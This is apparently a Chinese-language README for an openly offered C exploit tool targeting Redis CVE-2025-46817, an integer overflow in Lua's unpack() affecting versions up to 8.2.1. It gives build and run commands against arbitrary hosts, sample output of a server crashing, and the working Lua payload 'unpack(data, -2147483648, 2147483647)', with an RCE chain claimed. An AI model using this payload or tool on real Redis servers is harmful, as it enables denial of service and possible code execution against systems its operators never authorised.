一个针对 Redis 整数溢出漏洞 CVE-2025-46817 的轻量级 C 语言利用工具。
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev
sudo yum install gcc hiredis-devel
brew install hiredis
gcc -o exploit exploit.c -lhiredis
./exploit -H 127.0.0.1 -P 6379
./exploit -H 192.168.1.100 -P 6379 -t 5
-H <host> Redis 服务器主机(必填)
-P <port> Redis 服务器端口(必填)
-t <timeout> 连接超时时间(秒,默认:10)
-h 显示帮助信息
██▓███ █ █░███▄ █ ▄▄▄▄ █ ██ █████▒ █████▒▓█████ ██▀███
▓██░ ██▒▓█░ █ ░█░██ ▀█ █ ▓█████▄ ██ ▓██▒▓██ ▒▓██ ▒ ▓█ ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██ ▀█ ██▒▒██▒ ▄██▓██ ▒██░▒████ ░▒████ ░ ▒███ ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒ ▐▌██▒▒██░█▀ ▓▓█ ░██░░▓█▒ ░░▓█▒ ░ ▒▓█ ▄ ▒██▀▀█▄
▒██▒ ░ ░░░██▒██▓▒██░ ▓██░░▓█ ▀█▓▒▒█████▓ ░▒█░ ░▒█░ ░▒████▒░██▓ ▒██▒
▒▓▒░ ░ ░░ ▓░▒ ▒ ░ ▒░ ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒ ▒ ░ ▒ ░ ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░ ▒ ░ ░ ░ ░░ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░ ░ ░ ░ ░ ░▒ ░ ▒░
░░ ░ ░ ░ ░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░
░
CVE-2025-46817 漏洞利用工具
整数溢出 -> RCE 利用链
访问 -> https://pwnbuffer.org/
作者:Slayerkkk
目标:Redis <= 8.2.1
类型:内存破坏 -> 代码执行
ℹ️ 正在测试连接 127.0.0.1:6379...
✅ 连接成功
ℹ️ Redis 版本:8.2.1
❌ 存在漏洞 - 版本 <= 8.2.1
ℹ️ 正在测试 Lua 脚本...
✅ Lua 已启用(1+1=2)
🚀 开始利用
==================================================
💀 正在执行利用载荷...
载荷:通过 unpack() 实现整数溢出
💥 服务器已崩溃 - 连接丢失!
📊 利用结果
==============================
💥 状态:已崩溃(2.34秒)
💀 利用成功 - 服务器已崩溃!
已确认 CVE-2025-46817 漏洞
该漏洞针对 Redis 的 Lua unpack() 函数实现(luaB_unpack)中的整数溢出。当使用特定参数调用时,有符号整数运算会发生溢出,导致 Redis 尝试物化大量返回值。
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}
该工具会报告以下状态之一:
作者:Slayerkkk
网站:https://pwnbuffer.org